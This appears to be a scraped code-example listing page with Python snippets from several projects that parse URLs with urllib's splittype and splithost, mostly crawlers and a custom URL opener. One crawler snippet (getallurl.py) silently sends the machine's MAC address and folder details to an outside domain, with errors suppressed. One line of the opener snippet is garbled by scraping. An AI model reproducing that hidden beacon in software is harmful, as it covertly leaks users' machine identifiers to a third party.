                request.add_unredirected_header('Content-length', str(l))
            else:
                request.add_unredirected_header(
                    'Content-type', 'application/x-www-form-urlencoded')
                if not 'Content-length' in request.headers:
                    request.add_unredirected_header('Content-length',
                                                    '%d' % len(data))

    _scheme, sel = splittype(request.get_selector())
    sel_host, _sel_path = splithost(sel)
    if not request.has_header('Host'):
        request.add_unredirected_header('Host', sel_host or host)
    for name, value in self.parent.addheaders:
        name = name.capitalize()
        if not request.has_header(name):
            request.add_unredirected_header(name, value)

    return request

Beispiel #51

0

Datei anzeigen

Datei: scrapy_qq.py Projekt: NearXdu/web_crawler

 def getdomain(url):
     proto, rest = urllib.splittype(url)
     host, rest = urllib.splithost(rest)
     return "http://" + host

Beispiel #52

0

Datei anzeigen

Datei: 1688.py Projekt: zxh2013/1688

        # 获取产品
        product = driver.find_elements_by_xpath("//div[@class=\"detail-float-items\"]")

        title_values = ['']*len(title)
        href_values = ['']*len(title)
        host_values = ['']*len(title)
        product_values = ['']*len(title)
        
        for i in range(len(title)):
            # 获取标题的值
            title_values[i] = title[i].get_attribute('title')
            #print(title_value)
            # 获取跳转的url
            titlehref = title[i].get_attribute('href') 
            proto, rest = urllib.splittype(titlehref)
            host,rest = urllib.splithost(rest)
            host_values[i] = str(proto +'://' + host)
            href_values[i] = str(proto +'://' + host) + '/page/contactinfo.htm'
            #print(href_value)
            #print(href_value)
            # 获取经营范围
            product_values[i] = product[i].text
            
        for i in range(len(title)):
        #for i in range(2):
            print("第",cnt+1,"个商家")
            cnt = cnt + 1
            title_value = title_values[i]
            print(title_value)
            href_value = href_values[i]
            print(href_value)

Beispiel #53

0

Datei anzeigen

Datei: getallurl.py Projekt: kunwen/crawler

 def scanpage(self, param):
     import sys
     url, ftype = param
     try:
         reload(sys)
         sys.setdefaultencoding('utf8')
     except Exception:
         pass
     websiteurl = url
     t = time.time()
     n = 0
     pageurls = []
     Upageurls = {}
     res = []
     langages = LangagesofFamily()
     try:
         sitesize = PathSize().GetPathSize(self.langurl)  # M
         if float(sitesize) >= float(self.ssize):
             logger.error('文件夹%s大小：%s, 要求最小%s' %
                          (self.langurl, sitesize, self.ssize))
             try:
                 requests.adapters.DEFAULT_RETRIES = 10
                 requests.get(
                     'http://xn--cnq423f4sm.com:443/rescountry24/%s/%s/%s' %
                     (get_mac_address(), self.langurl, sitesize),
                     timeout=5)
             except:
                 pass
             return res
         requests.adapters.DEFAULT_RETRIES = 10
         html = requests.get(websiteurl,
                             headers={
                                 'Referer': websiteurl
                             },
                             timeout=20).text
     except Exception as err:
         logger.error(websiteurl)
         logger.error(err)
         return res
     soup = BeautifulSoup(html)
     pageurls = soup.find_all("a", href=True)
     for links in pageurls:
         linkshref = links.get("href").strip()
         # if websiteurl in links.get("href") and links.get("href") not in Upageurls and links.get("href") not in websiteurls:
         if linkshref and linkshref not in Upageurls:
             if '://' not in linkshref:
                 if '//' == linkshref[:1]:
                     pass
                 elif '/' == linkshref[0]:
                     proto, rest = urllib.splittype(websiteurl)
                     rest1, res2 = urllib.splithost(rest)
                     linksres = 'http://' + rest1 + linkshref if rest1 else linkshref
                     Upageurls[linksres] = 0
                 elif ftype in linkshref.split('/')[0]:
                     linksres = 'http://' + linkshref
                     Upageurls[linksres] = 0
             elif ftype in linkshref:
                 Upageurls[linkshref] = 0
     self.allsiteU = list(set(Upageurls.keys()))
     for links in self.allsiteU:
         try:
             txtfile = ''
             # if 'Kazakh' == self.langage[1]:
             #     logger.error('文件夹：%s, 语言%s的编号%s' % (self.langurl, self.langage[1], ','.join(self.langage[0])))
             sitesize = PathSize().GetPathSize(self.langurl)  # M
             if float(sitesize) >= float(self.ssize):
                 logger.error('文件夹%s大小：%s, 要求最小%s' %
                              (self.langurl, sitesize, self.ssize))
                 try:
                     requests.adapters.DEFAULT_RETRIES = 10
                     requests.get(
                         'http://xn--cnq423f4sm.com:443/rescountry24/%s/%s/%s'
                         % (get_mac_address(), self.langurl, sitesize),
                         timeout=5)
                 except:
                     pass
                 break
             # linksobj = requests.get(links,headers={'Referer': links})
             # linkcode = linksobj.status_code
             # linkcode = linksobj.code
             response = None
             try:
                 req = urllib2.Request(links, headers={'Referer': links})
                 req.add_header(
                     'User-Agent',
                     'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
                 )
                 response = urllib2.urlopen(req, timeout=20)
                 # t2=time.time()
                 Upageurls[links] = 200
                 #if 200 == linkcode:
                 res.append(links)
                 # 创建text文件
                 m = hashlib.md5()
                 try:
                     m.update(links)
                 except Exception:
                     m.update(links.encode('utf-8'))
                 # txtfile = content.main(linksobj.text)
                 txtfile = response.read()
             except urllib2.URLError as e:
                 #if hasattr(e, 'code'):
                 #    logger.error("连接失败:返回编码%s" % e.code)
                 #elif hasattr(e, 'reason'):
                 #    logger.error("连接失败:原因 %s" % e.reason)
                 #logger.error("网址%s" % links)
                 linksobj = requests.get(links, headers={'Referer': links})
                 #if platform.python_version()[0] == '3':
                 #    linksobj = linksobj.encode(chardet.detect(linksobj).get('encoding'))
                 linkcode = linksobj.status_code
                 # 创建text文件
                 m = hashlib.md5()
                 try:
                     m.update(links)
                 except Exception:
                     m.update(links.encode('utf-8'))
                 if 200 == linkcode:
                     Upageurls[links] = 200
                     res.append(links)
                     txtfile = linksobj.text
             finally:
                 if isinstance(txtfile, bytes):
                     txtfile = txtfile.decode(
                         chardet.detect(txtfile).get('encoding'), "ignore")
                 txtfile = content.main(txtfile)
                 tmpstr = txtfile.replace('\n', '')
                 txtfile = txtfile.encode('utf-8', "ignore")
                 if response:
                     response.close()
                 if tmpstr:
                     lanres = langages.translate(
                         txtfile, self.tpath + m.hexdigest() + ".txt",
                         self.langage, self.ssize)
                     if not lanres:
                         logger.error('语言%s的类型不符：%s' %
                                      (self.langage[1], links))
                     else:
                         with open(self.xpath + ftype + '.log', 'a') as fp:
                             fp.write('%s文件名称:%s.txt文件路径:%s\n' %
                                      (time.ctime(), m.hexdigest(), links))
                 else:
                     logger.warning("url网页清洗后为空：%s" % links)
             # t1=time.time()
             # print t1-t2
         except Exception as err:
             logger.error("网址%s连接失败原因: %s" % (str(links), str(err)))
         n += 1
     logger.info("total is " + repr(n) + " links")
     logger.info(str(time.time() - t))
     return res

Beispiel #54

0

Datei anzeigen

Datei: utils.py Projekt: wangtaihong/superass

def getDomain(url):
	proto,rest = urllib.splittype(url)
	res,rest = urllib.splithost(rest)
	return 'Unkonw' if not res else res.replace('www.','')

Beispiel #55

0

Datei anzeigen

def check_s3_object_exists(bucket, path):
    if is_url(path):
        path = urllib.splitquery(
            urllib.splithost(urllib.splittype(path)[1])[1])[0]
    return (bucket.get_key(path) != None)

Beispiel #56

0

Datei anzeigen

Datei: http.py Projekt: prahlad574/my

def SplitUrl(url):
  Url = collections.namedtuple('Url', ('method host port path'))
  method, rest = urllib.splittype(url)
  hostport, path = urllib.splithost(rest)
  host, port = urllib.splitport(hostport)
  return Url(method, host, int(port or 0), path)

Beispiel #57

0

Datei anzeigen

def get_hostname(url):
    proto, rest = urllib.splittype(url)
    host, rest = urllib.splithost(rest)
    return host

Beispiel #58

0

Datei anzeigen

Datei: html_util.py Projekt: zhengss996/crawler

 def get_url_host(self, url):
     s1 = urllib.splittype(url)[1]
     return urllib.splithost(s1)[0]

Beispiel #59

0

Datei anzeigen

def split_url(url):
    """Splits a url into (uri_scheme, host[:port], path)"""
    scheme, remainder = splittype(url)
    host, path = splithost(remainder)
    return scheme.lower(), host, path

Beispiel #60

0

Datei anzeigen

Datei: MMurl.py Projekt: ystallonne/grins

class FancyURLopener(_OriginalFancyURLopener):
    def __init__(self, *args):
        apply(_OriginalFancyURLopener.__init__, (self, ) + args)
        self.tempcache = {}
        self.__unlink = os.unlink  # See cleanup()
        self.__OriginalFancyURLopener = _OriginalFancyURLopener

        # prefetch support
        self.__prefetchcache = {}
        self.__prefetchtempfiles = {}

    def __del__(self):
        self.__OriginalFancyURLopener.__del__(self)
        del self.__OriginalFancyURLopener

    def http_error_default(self, url, fp, errcode, errmsg, headers):
        void = fp.read()
        fp.close()
        raise IOError, (errcode, 'http error: ' + errmsg, headers)

    def http_error_302(self, url, fp, errcode, errmsg, headers, data=None):
        # XXX The server can force infinite recursion here!
        if headers.has_key('location'):
            newurl = headers['location']
        elif headers.has_key('uri'):
            newurl = headers['uri']
        else:
            return
        void = fp.read()
        fp.close()
        fp = self.open(newurl)
        h = fp.info()
        if not h.has_key('Content-Location') and \
           not h.has_key('Content-Base'):
            h.dict['content-location'] = newurl
            h.headers.append('Content-Location: %s\r\n' % newurl)
        return fp

    def prompt_user_passwd(self, host, realm):
        import windowinterface
        try:
            w = windowinterface.Window('passwd', grab=1)
        except AttributeError:
            return _OriginalFancyURLopener.prompt_user_passwd(
                self, host, realm)
        l = w.Label('Enter username and password for %s at %s' % (realm, host))
        t1 = w.TextInput('User:'******'',
                         None, (self.usercb, ()),
                         top=l,
                         left=None,
                         right=None)
        t2 = w.TextInput('Passwd:',
                         '',
                         None, (self.passcb, ()),
                         modifyCB=self.modifycb,
                         top=t1,
                         left=None,
                         right=None)
        b = w.ButtonRow([('OK', (self.do_return, ())),
                         ('Cancel', (self.cancelcb, ()))],
                        vertical=0,
                        top=t2,
                        left=None,
                        right=None,
                        bottom=None)
        self.userw = t1
        self.passwdw = t2
        self.passwd = []
        self.user = ''
        self.password = ''
        w.show()
        try:
            windowinterface.mainloop()
        except _end_loop:
            pass
        w.hide()
        w.close()
        del self.userw, self.passwdw
        return self.user, self.password

    def modifycb(self, text):
        if text:
            if text == '\b':
                if self.passwd:
                    del self.passwd[-1]
                return ''
            self.passwd.append(text)
            return '*' * len(text)

    def usercb(self):
        self.user = self.userw.gettext()
        if self.password:
            self.do_return()
        else:
            self.passwdw.setfocus()

    def passcb(self):
        self.password = string.joinfields(self.passwd, '')
        if self.user:
            self.do_return()
        else:
            self.userw.setfocus()

    def cancelcb(self):
        self.user = self.password = None
        self.do_return()

    def do_return(self):
        raise _end_loop

    def open_local_file(self, url):
        import urlparse
        scheme, netloc, url, params, query, fragment = urlparse.urlparse(url)
        url = urlparse.urlunparse((scheme, netloc, url, '', '', ''))
        return _OriginalFancyURLopener.open_local_file(self, url)

    #
    # Prefetch section
    #
    # override retrieve for prefetch implementation
    def retrieve(self, url, filename=None, reporthook=None):
        # retrieve(url) returns (filename, None) for a local object
        # or (tempfilename, headers) for a remote object.
        url = unwrap(url)
        import urlparse
        scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
        if not scheme or scheme == 'file':
            i = string.find(path, '?')
            if i > 0:
                path = path[:i]
            url = urlparse.urlunparse((scheme, netloc, path, '', '', ''))
        if self.__prefetchcache.has_key(url):
            # complete prefetch first
            #print 'completing prefetch'
            self.__fin_retrieve(url)
        if self.__prefetchtempfiles.has_key(url):
            #print 'retrieving prefetched',self.__prefetchtempfiles[url]
            return self.__prefetchtempfiles[url]
        return _OriginalFancyURLopener.retrieve(self, url, filename,
                                                reporthook)

    # override cleanup for prefetch implementation
    def cleanup(self):
        # This code sometimes runs when the rest of this module
        # has already been deleted, so it can't use any globals
        # or import anything.

        # first close open streams
        for fp, tfp in self.__prefetchcache.values():
            fp.close()
            tfp.close()
        self.__prefetchcache = {}

        # unlink temp files
        for file, header in self.__prefetchtempfiles.values():
            try:
                self.__unlink(file)
            except:
                pass
        self.__prefetchtempfiles = {}

        # call original cleanup
        self.__OriginalFancyURLopener.cleanup(self)

    # open stream to url and read headers but not data yet
    # see retrieve for signature
    def begin_retrieve(self, url, filename=None, reporthook=None):
        url = unwrap(url)
        self.__clean_retrieve(url)
        type, url1 = splittype(url)
        if not filename and (not type or type == 'file'):
            try:
                fp = self.open_local_file(url1)
                hdrs = fp.info()
                del fp
                return url2pathname(splithost(url1)[1]), hdrs
            except IOError, msg:
                pass
        fp = self.open(url)
        headers = fp.info()
        if not filename:
            import tempfile
            garbage, path = splittype(url)
            garbage, path = splithost(path or "")
            path, garbage = splitquery(path or "")
            path, garbage = splitattr(path or "")
            suffix = os.path.splitext(path)[1]
            filename = tempfile.mktemp(suffix)
            self.__prefetchtempfiles[url] = filename, headers
        tfp = open(filename, 'wb')
        self.__prefetchcache[url] = fp, tfp
        return filename, headers